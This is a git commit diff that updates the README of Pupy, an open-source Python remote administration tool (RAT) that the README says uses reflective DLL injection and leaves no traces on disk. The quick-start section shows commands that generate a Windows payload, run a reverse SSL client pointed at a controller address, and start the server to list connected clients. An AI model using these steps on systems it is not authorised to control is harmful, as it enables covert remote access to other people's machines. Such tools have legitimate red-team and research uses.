Update README.md

This commit is contained in:
n1nj4sec 2015-09-21 22:24:27 +02:00 committed by n1nj4sec
parent 22805b90b9
commit d6be6f470c
1 changed files with 5 additions and 6 deletions

View File

@ -1,4 +1,4 @@
# pupy
# Pupy
Pupy is an opensource RAT (Remote Administration Tool) written in Python. Pupy uses reflective dll injection and leaves no traces on disk.
## Features :
@ -30,9 +30,9 @@ Pupy is an opensource RAT (Remote Administration Tool) written in Python. Pupy u
- interactive python shell
##Quick start
In these examples the server is running on a linux host (tested on kali linux) and it's IP address is 192.168.0.1
In these examples the server is running on a linux host (tested on kali linux) and it's IP address is 192.168.0.1
The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)
### generate a payload
### generate/run a payload
#### for Windows
```bash
./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe
@ -49,11 +49,10 @@ easy_install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443
```
### start the server
### having fun
1. eventually edit pupy.conf to change the bind address / port
2. start pupysh.py
2. start the pupy server :
```bash
./pupysh.py
```
3. type "clients" to display connected clients